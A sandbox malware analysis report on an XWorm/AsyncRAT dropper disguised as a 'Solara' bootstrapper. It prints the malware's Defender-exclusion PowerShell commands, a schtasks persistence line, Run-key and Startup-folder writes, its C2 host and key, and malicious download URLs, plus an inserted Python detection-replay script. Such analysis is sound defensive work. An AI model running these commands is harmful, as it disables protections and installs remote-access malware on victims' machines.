Windows Analysis Report
sDKRz09zM7.exe

Overview

General Information

Sample name: sDKRz09zM7.exe (renamed because the original name is a hash value)
Original sample name: 51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2.exe
Analysis ID: 1566238
MD5: 6c06275582db133a429e4149c0f1ac21
SHA1: 44c91c923711ed57cafbdd235fb4d1eac8a02a57
SHA256: 51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2
Tags: exe, user-Chainskilabs

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • sDKRz09zM7.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\sDKRz09zM7.exe" MD5: 6C06275582DB133A429E4149C0F1AC21)
    • not rat.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\not rat.exe" MD5: 270675071F6FA1DFAA122B58BC45D9AB)
      • powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3428 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 3456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BootstrapperV1.23_ModdedByHisako.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe" MD5: EDBE7F367BE35F4D0702F81FC432C9EC)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 8092 cmdline: C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8016 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8060 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7028 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7640 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • svchost.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • svchost.exe (PID: 5636 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • svchost.exe (PID: 7060 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
Malware configuration (XWorm, as recovered by the extractor):
{"C2 url": ["award-adware.gl.at.ply.gg"], "Port": 8848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Yara matches on dropped files

Source | Rule | Description | Author
\Device\ConDrv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x839e:$s6: VirtualBox
  • 0x82fc:$s8: Win32_ComputerSystem
  • 0x8d64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8e01:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f16:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x89dc:$cnc4: POST / HTTP/1.1
(4 further entries not shown in this extract)

Yara matches on memory dumps

Source | Rule | Description | Author
00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x20eee:$s6: VirtualBox
  • 0x2b52e:$s6: VirtualBox
  • 0x20e4c:$s8: Win32_ComputerSystem
  • 0x2b48c:$s8: Win32_ComputerSystem
  • 0x218b4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x2bef4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x21951:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x2bf91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x21a66:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2c0a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2152c:$cnc4: POST / HTTP/1.1
  • 0x2bb6c:$cnc4: POST / HTTP/1.1
00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(6 further entries not shown in this extract)

Yara matches on unpacked PEs

Source | Rule | Description | Author
2.0.not rat.exe.df0000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
2.0.not rat.exe.df0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
2.0.not rat.exe.df0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.0.not rat.exe.df0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x839e:$s6: VirtualBox
  • 0x82fc:$s8: Win32_ComputerSystem
  • 0x8d64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8e01:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f16:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x89dc:$cnc4: POST / HTTP/1.1
0.2.sDKRz09zM7.exe.3059b50.1.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(13 further entries not shown in this extract)

                          System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\not rat.exe, ProcessId: 7400, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7640, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7640, ProcessName: svchost.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\not rat.exe, ProcessId: 7400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\not rat.exe, ProcessId: 7400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3428, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3428, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 8016, ProcessName: svchost.exe
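The process tree and the Sigma matches above carry enough detail to replay the host-side behaviour (Defender exclusions via Add-MpPreference, a one-minute schtasks trigger, a svchost.exe copy in AppData, a Run key and a Startup .lnk) through detection logic. The following Python is an added example, not Joe Sandbox's code and not the Sigma rules themselves: its events are constructed from the report's PIDs, command lines and Sysmon-style fields, and the rule names and the SYSTEM_NAMES list are my own choices.

```python
"""Replay the host events from this report through a few detection checks.

Added example, not Joe Sandbox's code and not the Sigma rules themselves.
SAMPLE_EVENTS is constructed from the process tree and the Sigma "Data:"
fields on this page, shaped like the Sysmon fields those rules consume
(EventID 1 = process create, 11 = file create, 13 = registry value set).
Rule names and the SYSTEM_NAMES list are my own choices.
"""
import re
from pathlib import PureWindowsPath

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RAT = r"C:\Users\user\AppData\Roaming\not rat.exe"
FAKE_SVCHOST = r"C:\Users\user\AppData\Roaming\svchost.exe"

SAMPLE_EVENTS = [  # constructed from the report; PIDs as listed there
    {"EventID": 1, "ProcessId": 7628, "Image": PS,
     "CommandLine": f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{RAT}'"},
    {"EventID": 1, "ProcessId": 3428, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                    r'/tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"'},
    {"EventID": 1, "ProcessId": 7640, "Image": FAKE_SVCHOST, "CommandLine": FAKE_SVCHOST},
    {"EventID": 1, "ProcessId": 8016, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k WerSvcGroup"},  # legitimate; must not fire
    {"EventID": 11, "ProcessId": 7400, "Image": RAT, "TargetFilename": FAKE_SVCHOST},
    {"EventID": 11, "ProcessId": 7400, "Image": RAT,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk"},
    {"EventID": 13, "ProcessId": 7400, "Image": RAT,
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost",
     "Details": FAKE_SVCHOST},
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "winlogon.exe"}
TR_ARG = re.compile(r'/tr\s+"?([^"]+)"?', re.I)   # target of schtasks /tr, quoted or not
MO_ONE = re.compile(r"/mo\s+1\b")                  # modifier 1, not 10 or 15


def in_system_dir(path):
    """True when the file's parent directory is System32 or SysWOW64 (case-insensitive)."""
    return str(PureWindowsPath(path).parent).lower() in SYSTEM_DIRS


def rule_defender_exclusion(ev):
    """PowerShell adding a Defender path or process exclusion via Add-MpPreference."""
    cl = ev.get("CommandLine", "").lower()
    return (ev["EventID"] == 1 and ev["Image"].lower().endswith("powershell.exe")
            and "add-mppreference" in cl and ("-exclusionpath" in cl or "-exclusionprocess" in cl))


def rule_execution_policy_bypass(ev):
    return ev["EventID"] == 1 and "-executionpolicy bypass" in ev.get("CommandLine", "").lower()


def rule_system_name_outside_system_dir(ev):
    """A file named like a Windows system binary created or executed outside System32/SysWOW64."""
    path = ev["Image"] if ev["EventID"] == 1 else ev.get("TargetFilename", "")
    return bool(path) and PureWindowsPath(path).name.lower() in SYSTEM_NAMES and not in_system_dir(path)


def rule_schtasks_minute_task_from_user_dir(ev):
    """schtasks /create with a one-minute trigger whose /tr target lives under a user profile."""
    if ev["EventID"] != 1 or not ev["Image"].lower().endswith("schtasks.exe"):
        return False
    cl = ev["CommandLine"]
    low = cl.lower()
    target = TR_ARG.search(cl)
    return ("/create" in low and "/sc minute" in low and MO_ONE.search(low) is not None
            and target is not None and "\\appdata\\" in target.group(1).lower())


def rule_run_key_to_user_dir(ev):
    return (ev["EventID"] == 13 and "\\currentversion\\run\\" in ev.get("TargetObject", "").lower()
            and "\\appdata\\" in ev.get("Details", "").lower())


def rule_startup_folder_write(ev):
    return ev["EventID"] == 11 and "\\start menu\\programs\\startup\\" in ev.get("TargetFilename", "").lower()


RULES = {
    "defender_exclusion_added": rule_defender_exclusion,
    "execution_policy_bypass": rule_execution_policy_bypass,
    "system_binary_name_outside_system_dir": rule_system_name_outside_system_dir,
    "schtasks_minute_task_from_user_dir": rule_schtasks_minute_task_from_user_dir,
    "run_key_points_to_user_dir": rule_run_key_to_user_dir,
    "startup_folder_write": rule_startup_folder_write,
}


def scan(events):
    """Return sorted (rule name, ProcessId) pairs for every rule that fires on every event."""
    hits = set()
    for ev in events:
        for name, check in RULES.items():
            if check(ev):
                hits.add((name, ev["ProcessId"]))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in scan(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
```

Run against the constructed events, every rule fires on the PIDs the report attributes the behaviour to (7628, 3428, 7640, 7400) and none fires on the legitimate WerSvcGroup svchost.exe (PID 8016), which is the check to keep when tuning the system-binary-name rule on real telemetry.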

                          Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3428, ProcessName: schtasks.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-01T20:08:04.943707+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 104.21.93.27 | 443 | TCP
2024-12-01T20:09:33.366446+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49720 | 147.185.221.24 | 8848 | TCP


                          AV Detection

Source: sDKRz09zM7.exe | Avira: detected
Source: award-adware.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Sola | Avira URL Cloud: Label: malware
Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip | Avira URL Cloud: Label: malware
Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | Avira URL Cloud: Label: malware
Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solao | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\not rat.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["award-adware.gl.at.ply.gg"], "Port": 8848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | ReversingLabs: Detection: 75%
